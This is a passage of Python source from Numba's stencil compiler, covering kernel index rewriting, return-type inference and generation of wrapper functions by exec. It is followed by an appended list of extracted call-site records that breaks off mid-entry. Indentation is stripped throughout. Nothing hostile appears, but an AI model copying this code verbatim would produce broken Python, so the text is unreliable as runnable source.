const_index_vars = []
ind_stencils = []
stmt_index_var_typ = typemap[stmt_index_var.name]
# Same idea as above but you have to extract
# individual elements out of the tuple indexing
# expression and add the corresponding index variable
# to them and then reconstitute as a tuple that can
# index the array.
for dim in range(ndim):
tmpname = ir_utils.mk_unique_var("const_index")
tmpvar = ir.Var(scope, tmpname, loc)
new_body.append(ir.Assign(ir.Const(dim, loc),
tmpvar, loc))
const_index_vars += [tmpvar]
index_var = ir.Var(scope, index_names[dim], loc)
index_vars += [index_var]
tmpname = ir_utils.mk_unique_var("ind_stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
ind_stencils += [tmpvar]
getitemname = ir_utils.mk_unique_var("getitem")
getitemvar = ir.Var(scope, getitemname, loc)
getitemcall = ir.Expr.getitem(stmt_index_var,
const_index_vars[dim], loc)
new_body.append(ir.Assign(getitemcall, getitemvar, loc))
# Get the type of this particular part of the index tuple.
if isinstance(stmt_index_var_typ, types.ConstSized):
one_index_typ = stmt_index_var_typ[dim]
else:
one_index_typ = stmt_index_var_typ[:]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(one_index_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
else:
acc_call = ir.Expr.binop(operator.add, getitemvar,
index_vars[dim], loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
tuple_call = ir.Expr.build_tuple(ind_stencils, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value,s_index_var,loc),
stmt.target,loc))
else:
new_body.append(stmt)
block.body = new_body
if need_to_calc_kernel:
# Find the size of the kernel by finding the maximum absolute value
# index used in the kernel specification.
neighborhood = [[0,0] for _ in range(ndim)]
if len(kernel_consts) == 0:
raise NumbaValueError("Stencil kernel with no accesses to "
"relatively indexed arrays.")
for index in kernel_consts:
if isinstance(index, tuple) or isinstance(index, list):
for i in range(len(index)):
te = index[i]
if isinstance(te, ir.Var) and te.name in const_dict:
te = const_dict[te.name]
if isinstance(te, int):
neighborhood[i][0] = min(neighborhood[i][0], te)
neighborhood[i][1] = max(neighborhood[i][1], te)
else:
raise NumbaValueError(
"stencil kernel index is not constant,"
"'neighborhood' option required")
index_len = len(index)
elif isinstance(index, int):
neighborhood[0][0] = min(neighborhood[0][0], index)
neighborhood[0][1] = max(neighborhood[0][1], index)
index_len = 1
else:
raise NumbaValueError(
"Non-tuple or non-integer used as stencil index.")
if index_len != ndim:
raise NumbaValueError(
"Stencil index does not match array dimensionality.")
return (neighborhood, relatively_indexed)
def get_return_type(self, argtys):
if config.DEBUG_ARRAY_OPT >= 1:
print("get_return_type", argtys)
ir_utils.dump_blocks(self.kernel_ir.blocks)
if not isinstance(argtys[0], types.npytypes.Array):
raise NumbaValueError("The first argument to a stencil kernel must "
"be the primary input array.")
from numba.core import typed_passes
typemap, return_type, calltypes, _ = typed_passes.type_inference_stage(
self._typingctx,
self._targetctx,
self.kernel_ir,
argtys,
None,
{})
if isinstance(return_type, types.npytypes.Array):
raise NumbaValueError(
"Stencil kernel must return a scalar and not a numpy array.")
real_ret = types.npytypes.Array(return_type, argtys[0].ndim,
argtys[0].layout)
return (real_ret, typemap, calltypes)
def _install_type(self, typingctx):
"""Constructs and installs a typing class for a StencilFunc object in
the input typing context.
"""
_ty_cls = type('StencilFuncTyping_' +
str(self.id),
(AbstractTemplate,),
dict(key=self, generic=self._type_me))
typingctx.insert_user_function(self, _ty_cls)
def compile_for_argtys(self, argtys, kwtys, return_type, sigret):
# look in the type cache to find if result array is passed
(_, result, typemap, calltypes) = self._type_cache[argtys]
new_func = self._stencil_wrapper(result, sigret, return_type,
typemap, calltypes, *argtys)
return new_func
def _type_me(self, argtys, kwtys):
"""
Implement AbstractTemplate.generic() for the typing class
built by StencilFunc._install_type().
Return the call-site signature.
"""
if (self.neighborhood is not None and
len(self.neighborhood) != argtys[0].ndim):
raise NumbaValueError("%d dimensional neighborhood specified "
"for %d dimensional input array" %
(len(self.neighborhood), argtys[0].ndim))
argtys_extra = argtys
sig_extra = ""
result = None
if 'out' in kwtys:
argtys_extra += (kwtys['out'],)
sig_extra += ", out=None"
result = kwtys['out']
if 'neighborhood' in kwtys:
argtys_extra += (kwtys['neighborhood'],)
sig_extra += ", neighborhood=None"
# look in the type cache first
if argtys_extra in self._type_cache:
(_sig, _, _, _) = self._type_cache[argtys_extra]
return _sig
(real_ret, typemap, calltypes) = self.get_return_type(argtys)
sig = signature(real_ret, *argtys_extra)
dummy_text = ("def __numba_dummy_stencil({}{}):\n pass\n".format(
",".join(self.kernel_ir.arg_names), sig_extra))
exec(dummy_text) in globals(), locals()
dummy_func = eval("__numba_dummy_stencil")
sig = sig.replace(pysig=utils.pysignature(dummy_func))
self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)])
self._type_cache[argtys_extra] = (sig, result, typemap, calltypes)
return sig
def copy_ir_with_calltypes(self, ir, calltypes):
"""
Create a copy of a given IR along with its calltype information.
We need a copy of the calltypes because copy propagation applied
to the copied IR will change the calltypes and make subsequent
uses of the original IR invalid.
"""
copy_calltypes = {}
kernel_copy = ir.copy()
kernel_copy.blocks = {}
# For each block...
for (block_label, block) in ir.blocks.items():
new_block = copy.deepcopy(ir.blocks[block_label])
new_block.body = []
# For each statement in each block...
for stmt in ir.blocks[block_label].body:
# Copy the statement to the new copy of the kernel
# and if the original statement is in the original
# calltypes then add the type associated with this
# statement to the calltypes copy.
scopy = copy.deepcopy(stmt)
new_block.body.append(scopy)
if stmt in calltypes:
copy_calltypes[scopy] = calltypes[stmt]
kernel_copy.blocks[block_label] = new_block
return (kernel_copy, copy_calltypes)
def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args):
# Overall approach:
# 1) Construct a string containing a function definition for the stencil function
# that will execute the stencil kernel. This function definition includes a
# unique stencil function name, the parameters to the stencil kernel, loop
# nests across the dimensions of the input array. Those loop nests use the
# computed stencil kernel size so as not to try to compute elements where
# elements outside the bounds of the input array would be needed.
# 2) The but of the loop nest in this new function is a special sentinel
# assignment.
# 3) Get the IR of this new function.
# 4) Split the block containing the sentinel assignment and remove the sentinel
# assignment. Insert the stencil kernel IR into the stencil function IR
# after label and variable renaming of the stencil kernel IR to prevent
# conflicts with the stencil function IR.
# 5) Compile the combined stencil function IR + stencil kernel IR into existence.
# Copy the kernel so that our changes for this callsite
# won't effect other callsites.
(kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes(
self.kernel_ir, calltypes)
# The stencil kernel body becomes the body of a loop, for which args aren't needed.
ir_utils.remove_args(kernel_copy.blocks)
first_arg = kernel_copy.arg_names[0]
in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap)
name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks)
ir_utils.apply_copy_propagate(
kernel_copy.blocks,
in_cps,
name_var_table,
typemap,
copy_calltypes)
if "out" in name_var_table:
raise NumbaValueError("Cannot use the reserved word 'out' in stencil kernels.")
sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table)
if config.DEBUG_ARRAY_OPT >= 1:
print("name_var_table", name_var_table, sentinel_name)
the_array = args[0]
if config.DEBUG_ARRAY_OPT >= 1:
print("_stencil_wrapper", return_type, return_type.dtype,
type(return_type.dtype), args)
ir_utils.dump_blocks(kernel_copy.blocks)
# We generate a Numba function to execute this stencil and here
# create the unique name of this function.
stencil_func_name = "__numba_stencil_%s_%s" % (
hex(id(the_array)).replace("-", "_"),
self.id)
# We will put a loop nest in the generated function for each
# dimension in the input array. Here we create the name for
# the index variable for each dimension. index0, index1, ...
index_vars = []
for i in range(the_array.ndim):
index_var_name = ir_utils.get_unused_var_name("index" + str(i),
name_var_table)
index_vars += [index_var_name]
# Create extra signature for out and neighborhood.
out_name = ir_utils.get_unused_var_name("out", name_var_table)
neighborhood_name = ir_utils.get_unused_var_name("neighborhood",
name_var_table)
sig_extra = ""
if result is not None:
sig_extra += ", {}=None".format(out_name)
if "neighborhood" in dict(self.kws):
sig_extra += ", {}=None".format(neighborhood_name)
# Get a list of the standard indexed array names.
standard_indexed = self.options.get("standard_indexing", [])
if first_arg in standard_indexed:
raise NumbaValueError("The first argument to a stencil kernel must "
"use relative indexing, not standard indexing.")
if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0:
raise NumbaValueError("Standard indexing requested for an array name "
"not present in the stencil kernel definition.")
# Add index variables to getitems in the IR to transition the accesses
# in the kernel from relative to regular Python indexing. Returns the
# computed size of the stencil kernel and a list of the relatively indexed
# arrays.
kernel_size, relatively_indexed = self.add_indices_to_kernel(
kernel_copy, index_vars, the_array.ndim,
self.neighborhood, standard_indexed, typemap, copy_calltypes)
if self.neighborhood is None:
self.neighborhood = kernel_size
if config.DEBUG_ARRAY_OPT >= 1:
print("After add_indices_to_kernel")
ir_utils.dump_blocks(kernel_copy.blocks)
# The return in the stencil kernel becomes a setitem for that
# particular point in the iteration space.
ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks,
index_vars, out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("After replace_return_with_setitem", ret_blocks)
ir_utils.dump_blocks(kernel_copy.blocks)
# Start to form the new function to execute the stencil kernel.
func_text = "def {}({}{}):\n".format(stencil_func_name,
",".join(kernel_copy.arg_names), sig_extra)
# Get loop ranges for each dimension, which could be either int
# or variable. In the latter case we'll use the extra neighborhood
# argument to the function.
ranges = []
for i in range(the_array.ndim):
if isinstance(kernel_size[i][0], int):
lo = kernel_size[i][0]
hi = kernel_size[i][1]
else:
lo = "{}[{}][0]".format(neighborhood_name, i)
hi = "{}[{}][1]".format(neighborhood_name, i)
ranges.append((lo, hi))
# If there are more than one relatively indexed arrays, add a call to
# a function that will raise an error if any of the relatively indexed
# arrays are of different size than the first input array.
if len(relatively_indexed) > 1:
func_text += " raise_if_incompatible_array_sizes(" + first_arg
for other_array in relatively_indexed:
if other_array != first_arg:
func_text += "," + other_array
func_text += ")\n"
# Get the shape of the first input array.
shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table)
func_text += " {} = {}.shape\n".format(shape_name, first_arg)
# Converts cval to a string constant
def cval_as_str(cval):
if not np.isfinite(cval):
# See if this is a string-repr numerical const, issue #7286
if np.isnan(cval):
return "np.nan"
elif np.isinf(cval):
if cval < 0:
return "-np.inf"
else:
return "np.inf"
else:
return str(cval)
# If we have to allocate the output array (the out argument was not used)
# then us numpy.full if the user specified a cval stencil decorator option
# or np.zeros if they didn't to allocate the array.
if result is None:
return_type_name = numpy_support.as_dtype(
return_type.dtype).type.__name__
if "cval" in self.options:
cval = self.options["cval"]
if return_type.dtype != typing.typeof.typeof(cval):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init ="{} = np.full({}, {}, dtype=np.{})\n".format(
out_name, shape_name, cval_as_str(cval),
return_type_name)
else:
out_init ="{} = np.zeros({}, dtype=np.{})\n".format(
out_name, shape_name, return_type_name)
func_text += " " + out_init
else: # result is present, if cval is set then use it
if "cval" in self.options:
cval = self.options["cval"]
cval_ty = typing.typeof.typeof(cval)
if not self._typingctx.can_convert(cval_ty, return_type.dtype):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init = "{}[:] = {}\n".format(out_name, cval_as_str(cval))
func_text += " " + out_init
offset = 1
# Add the loop nests to the new function.
for i in range(the_array.ndim):
for j in range(offset):
func_text += " "
# ranges[i][0] is the minimum index used in the i'th dimension
# but minimum's greater than 0 don't preclude any entry in the array.
# So, take the minimum of 0 and the minimum index found in the kernel
# and this will be a negative number (potentially -0). Then, we do
# unary - on that to get the positive offset in this dimension whose
# use is precluded.
# ranges[i][1] is the maximum of 0 and the observed maximum index
# in this dimension because negative maximums would not cause us to
# preclude any entry in the array from being used.
func_text += ("for {} in range(-min(0,{}),"
"{}[{}]-max(0,{})):\n").format(
index_vars[i],
ranges[i][0],
shape_name,
i,
ranges[i][1])
offset += 1
for j in range(offset):
func_text += " "
# Put a sentinel in the code so we can locate it in the IR. We will
# remove this sentinel assignment and replace it with the IR for the
# stencil kernel body.
func_text += "{} = 0\n".format(sentinel_name)
func_text += " return {}\n".format(out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("new stencil func text")
print(func_text)
# Force the new stencil function into existence.
exec(func_text) in globals(), locals()
stencil_func = eval(stencil_func_name)
if sigret is not None:
pysig = utils.pysignature(stencil_func)
sigret.pysig = pysig
# Get the IR for the newly created stencil function.
from numba.core import compiler
stencil_ir = compiler.run_frontend(stencil_func)
ir_utils.remove_dels(stencil_ir.blocks)
# rename all variables in stencil_ir afresh
var_table = ir_utils.get_name_var_table(stencil_ir.blocks)
new_var_dict = {}
reserved_names = ([sentinel_name, out_name, neighborhood_name,
shape_name] + kernel_copy.arg_names + index_vars)
for name, var in var_table.items():
if not name in reserved_names:
new_var_dict[name] = ir_utils.mk_unique_var(name)
ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict)
stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1
# Shift labels in the kernel copy so they are guaranteed unique
# and don't conflict with any labels in the stencil_ir.
kernel_copy.blocks = ir_utils.add_offset_to_labels(
kernel_copy.blocks, stencil_stub_last_label)
new_label = max(kernel_copy.blocks.keys()) + 1
# Adjust ret_blocks to account for addition of the offset.
ret_blocks = [x + stencil_stub_last_label for x in ret_blocks]
if config.DEBUG_ARRAY_OPT >= 1:
print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label)
print("before replace sentinel stencil_ir")
ir_utils.dump_blocks(stencil_ir.blocks)
print("before replace sentinel kernel_copy")
ir_utils.dump_blocks(kernel_copy.blocks)
# Search all the block in the stencil outline for the sentinel.
for label, block in stencil_ir.blocks.items():
for i, inst in enumerate(block.body):
if (isinstance( inst, ir.Assign) and
inst.target.name == sentinel_name):
# We found the sentinel assignment.
loc = inst.loc
scope = block.scope
# split block across __sentinel__
# A new block is allocated for the statements prior to the
# sentinel but the new block maintains the current block
# label.
prev_block = ir.Block(scope, loc)
prev_block.body = block.body[:i]
# The current block is used for statements after sentinel.
block.body = block.body[i + 1:]
# But the current block gets a new label.
body_first_label = min(kernel_copy.blocks.keys())
# The previous block jumps to the minimum labelled block of
# the parfor body.
prev_block.append(ir.Jump(body_first_label, loc))
# Add all the parfor loop body blocks to the gufunc
# function's IR.
for (l, b) in kernel_copy.blocks.items():
stencil_ir.blocks[l] = b
stencil_ir.blocks[new_label] = block
stencil_ir.blocks[label] = prev_block
# Add a jump from all the blocks that previously contained
# a return in the stencil kernel to the block
# containing statements after the sentinel.
for ret_block in ret_blocks:
stencil_ir.blocks[ret_block].append(
ir.Jump(new_label, loc))
break
else:
continue
break
stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks)
ir_utils.remove_dels(stencil_ir.blocks)
assert(isinstance(the_array, types.Type))
array_types = args
new_stencil_param_types = list(array_types)
if config.DEBUG_ARRAY_OPT >= 1:
print("new_stencil_param_types", new_stencil_param_types)
ir_utils.dump_blocks(stencil_ir.blocks)
# Compile the combined stencil function with the replaced loop
# body in it.
ir_utils.fixup_var_define_in_scope(stencil_ir.blocks)
new_func = compiler.compile_ir(
self._typingctx,
self._targetctx,
stencil_ir,
new_stencil_param_types,
None,
compiler.DEFAULT_FLAGS,
{})
return new_func
def __call__(self, *args, **kwargs):
if (self.neighborhood is not None and
len(self.neighborhood) != args[0].ndim):
raise ValueError("{} dimensional neighborhood specified for {} "
"dimensional input array".format(
len(self.neighborhood), args[0].ndim))
if 'out' in kwargs:
result = kwargs['out']
rdtype = result.dtype
rttype = numpy_support.from_dtype(rdtype)
result_type = types.npytypes.Array(rttype, result.ndim,
numpy_support.map_layout(result))
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = tuple([typing.typeof.typeof(x) for x in args] +
[result_type])
else:
result = None
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = array_types
if config.DEBUG_ARRAY_OPT >= 1:
print("__call__", array_types, args, kwargs)
(real_ret, typemap, calltypes) = self.get_return_type(array_types)
new_func = self._stencil_wrapper(result, None, real_ret, typemap,
calltypes, *array_types_full)
if result is None:
return new_func.entry_point(*args)
else:
return new_func.entry_point(*(args+(result,)))
def stencil(func_or_mode='constant', **options):
# called on function without specifying mode style
if not isinstance(func_or_mode, str):
mode = 'constant' # default style
func = func_or_mode
else:
mode = func_or_mode
func = None
for option in options:
if option not in ["cval", "standard_indexing", "neighborhood"]:
raise ValueError("Unknown stencil option " + option)
wrapper = _stencil(mode, options)
if func is not None:
return wrapper(func)
return wrapper
def _stencil(mode, options):
if mode != 'constant':
raise ValueError("Unsupported mode style " + mode)
def decorated(func):
from numba.core import compiler
kernel_ir = compiler.run_frontend(func)
return StencilFunc(kernel_ir, mode, options)
return decorated
@lower_builtin(stencil)
def stencil_dummy_lower(context, builder, sig, args):
"lowering for dummy stencil calls"
return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
| [((827, 1, 827, 23), 'numba.core.imputils.lower_builtin', 'lower_builtin', ({(827, 15, 827, 22): 'stencil'}, {}), '(stencil)', False, 'from numba.core.imputils import lower_builtin\n'), ((48, 15, 48, 35), 'numba.misc.special.literal_unroll', 'literal_unroll', ({(48, 30, 48, 34): 'args'}, {}), '(args)', False, 'from numba.misc.special import literal_unroll\n'), ((155, 22, 155, 61), 'numba.core.ir_utils.get_tuple_table', 'ir_utils.get_tuple_table', ({(155, 47, 155, 60): 'kernel.blocks'}, {}), '(kernel.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((348, 45, 354, 19), 'numba.core.typed_passes.type_inference_stage', 'typed_passes.type_inference_stage', ({(349, 16, 349, 31): 'self._typingctx', (350, 16, 350, 31): 'self._targetctx', (351, 16, 351, 30): 'self.kernel_ir', (352, 16, 352, 22): 'argtys', (353, 16, 353, 20): 'None', (354, 16, 354, 18): '{}'}, {}), '(self._typingctx, self._targetctx, self.\n kernel_ir, argtys, None, {})', False, 'from numba.core import typed_passes\n'), ((359, 19, 360, 70), 'numba.core.types.npytypes.Array', 'types.npytypes.Array', ({(359, 40, 359, 51): 'return_type', (359, 53, 359, 67): 'argtys[0].ndim', (360, 53, 360, 69): 'argtys[0].layout'}, {}), '(return_type, argtys[0].ndim, argtys[0].layout)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((410, 14, 410, 48), 'numba.core.typing.templates.signature', 'signature', ({(410, 24, 410, 32): 'real_ret', (410, 34, 410, 47): '*argtys_extra'}, {}), '(real_ret, *argtys_extra)', False, 'from numba.core.typing.templates import CallableTemplate, signature, infer_global, AbstractTemplate\n'), ((428, 22, 428, 31), 'numba.core.ir.copy', 'ir.copy', ({}, {}), '()', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((431, 36, 431, 53), 'numba.core.ir.blocks.items', 'ir.blocks.items', ({}, {}), '()', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((469, 8, 469, 48), 'numba.core.ir_utils.remove_args', 'ir_utils.remove_args', ({(469, 29, 469, 47): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((472, 26, 472, 78), 'numba.core.ir_utils.copy_propagate', 'ir_utils.copy_propagate', ({(472, 50, 472, 68): 'kernel_copy.blocks', (472, 70, 472, 77): 'typemap'}, {}), '(kernel_copy.blocks, typemap)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((473, 25, 473, 72), 'numba.core.ir_utils.get_name_var_table', 'ir_utils.get_name_var_table', ({(473, 53, 473, 71): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((474, 8, 479, 27), 'numba.core.ir_utils.apply_copy_propagate', 'ir_utils.apply_copy_propagate', ({(475, 12, 475, 30): 'kernel_copy.blocks', (476, 12, 476, 18): 'in_cps', (477, 12, 477, 26): 'name_var_table', (478, 12, 478, 19): 'typemap', (479, 12, 479, 26): 'copy_calltypes'}, {}), '(kernel_copy.blocks, in_cps, name_var_table,\n typemap, copy_calltypes)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((484, 24, 484, 84), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(484, 53, 484, 67): '"""__sentinel__"""', (484, 69, 484, 83): 'name_var_table'}, {}), "('__sentinel__', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((511, 19, 511, 70), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(511, 48, 511, 53): '"""out"""', (511, 55, 511, 69): 'name_var_table'}, {}), "('out', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((512, 28, 513, 72), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(512, 57, 512, 71): '"""neighborhood"""', (513, 57, 513, 71): 'name_var_table'}, {}), "('neighborhood', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((582, 21, 582, 79), 'numba.core.ir_utils.get_unused_var_name', 'ir_utils.get_unused_var_name', ({(582, 50, 582, 62): '"""full_shape"""', (582, 64, 582, 78): 'name_var_table'}, {}), "('full_shape', name_var_table)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((670, 21, 670, 56), 'numba.core.compiler.run_frontend', 'compiler.run_frontend', ({(670, 43, 670, 55): 'stencil_func'}, {}), '(stencil_func)', False, 'from numba.core import compiler\n'), ((671, 8, 671, 47), 'numba.core.ir_utils.remove_dels', 'ir_utils.remove_dels', ({(671, 29, 671, 46): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((674, 20, 674, 66), 'numba.core.ir_utils.get_name_var_table', 'ir_utils.get_name_var_table', ({(674, 48, 674, 65): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((681, 8, 681, 67), 'numba.core.ir_utils.replace_var_names', 'ir_utils.replace_var_names', ({(681, 35, 681, 52): 'stencil_ir.blocks', (681, 54, 681, 66): 'new_var_dict'}, {}), '(stencil_ir.blocks, new_var_dict)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((687, 29, 688, 76), 'numba.core.ir_utils.add_offset_to_labels', 'ir_utils.add_offset_to_labels', ({(688, 32, 688, 50): 'kernel_copy.blocks', (688, 52, 688, 75): 'stencil_stub_last_label'}, {}), '(kernel_copy.blocks, stencil_stub_last_label)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((740, 28, 740, 69), 'numba.core.ir_utils.rename_labels', 'ir_utils.rename_labels', ({(740, 51, 740, 68): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((741, 8, 741, 47), 'numba.core.ir_utils.remove_dels', 'ir_utils.remove_dels', ({(741, 29, 741, 46): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((754, 8, 754, 61), 'numba.core.ir_utils.fixup_var_define_in_scope', 'ir_utils.fixup_var_define_in_scope', ({(754, 43, 754, 60): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((755, 19, 762, 15), 'numba.core.compiler.compile_ir', 'compiler.compile_ir', ({(756, 12, 756, 27): 'self._typingctx', (757, 12, 757, 27): 'self._targetctx', (758, 12, 758, 22): 'stencil_ir', (759, 12, 759, 35): 'new_stencil_param_types', (760, 12, 760, 16): 'None', (761, 12, 761, 34): 'compiler.DEFAULT_FLAGS', (762, 12, 762, 14): '{}'}, {}), '(self._typingctx, self._targetctx, stencil_ir,\n new_stencil_param_types, None, compiler.DEFAULT_FLAGS, {})', False, 'from numba.core import compiler\n'), ((822, 20, 822, 47), 'numba.core.compiler.run_frontend', 'compiler.run_frontend', ({(822, 42, 822, 46): 'func'}, {}), '(func)', False, 'from numba.core import compiler\n'), ((830, 24, 830, 56), 'llvmlite.ir.IntType', 'lir.IntType', ({(830, 36, 830, 55): 'types.intp.bitwidth'}, {}), '(types.intp.bitwidth)', True, 'from llvmlite import ir as lir\n'), ((145, 12, 145, 47), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(145, 33, 145, 46): 'kernel.blocks'}, {}), '(kernel.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((341, 12, 341, 55), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(341, 33, 341, 54): 'self.kernel_ir.blocks'}, {}), '(self.kernel_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((344, 18, 345, 64), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(344, 34, 345, 63): '"""The first argument to a stencil kernel must be the primary input array."""'}, {}), "(\n 'The first argument to a stencil kernel must be the primary input array.')", False, 'from numba.core.errors import NumbaValueError\n'), ((356, 18, 357, 77), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(357, 16, 357, 76): '"""Stencil kernel must return a scalar and not a numpy array."""'}, {}), "('Stencil kernel must return a scalar and not a numpy array.')", False, 'from numba.core.errors import NumbaValueError\n'), ((432, 24, 432, 61), 'copy.deepcopy', 'copy.deepcopy', ({(432, 38, 432, 60): 'ir.blocks[block_label]'}, {}), '(ir.blocks[block_label])', False, 'import copy\n'), ((482, 18, 482, 91), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(482, 34, 482, 90): '"""Cannot use the reserved word \'out\' in stencil kernels."""'}, {}), '("Cannot use the reserved word \'out\' in stencil kernels.")', False, 'from numba.core.errors import NumbaValueError\n'), ((493, 12, 493, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(493, 33, 493, 51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((524, 18, 525, 82), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(524, 34, 525, 81): '"""The first argument to a stencil kernel must use relative indexing, not standard indexing."""'}, {}), "(\n 'The first argument to a stencil kernel must use relative indexing, not standard indexing.'\n )", False, 'from numba.core.errors import NumbaValueError\n'), ((528, 18, 529, 82), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(528, 34, 529, 81): '"""Standard indexing requested for an array name not present in the stencil kernel definition."""'}, {}), "(\n 'Standard indexing requested for an array name not present in the stencil kernel definition.'\n )", False, 'from numba.core.errors import NumbaValueError\n'), ((543, 12, 543, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(543, 33, 543, 51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((552, 12, 552, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(552, 33, 552, 51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((666, 20, 666, 51), 'numba.core.utils.pysignature', 'utils.pysignature', ({(666, 38, 666, 50): 'stencil_func'}, {}), '(stencil_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((696, 12, 696, 51), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(696, 33, 696, 50): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((698, 12, 698, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(698, 33, 698, 51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((750, 12, 750, 51), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(750, 33, 750, 50): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((775, 21, 775, 53), 'numba.np.numpy_support.from_dtype', 'numpy_support.from_dtype', ({(775, 46, 775, 52): 'rdtype'}, {}), '(rdtype)', False, 'from numba.np import numpy_support\n'), ((307, 22, 308, 67), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(307, 38, 308, 66): '"""Stencil kernel with no accesses to relatively indexed arrays."""'}, {}), "('Stencil kernel with no accesses to relatively indexed arrays.'\n )", False, 'from numba.core.errors import NumbaValueError\n'), ((415, 32, 415, 61), 'numba.core.utils.pysignature', 'utils.pysignature', ({(415, 50, 415, 60): 'dummy_func'}, {}), '(dummy_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((440, 24, 440, 43), 'copy.deepcopy', 'copy.deepcopy', ({(440, 38, 440, 42): 'stmt'}, {}), '(stmt)', False, 'import copy\n'), ((587, 19, 587, 36), 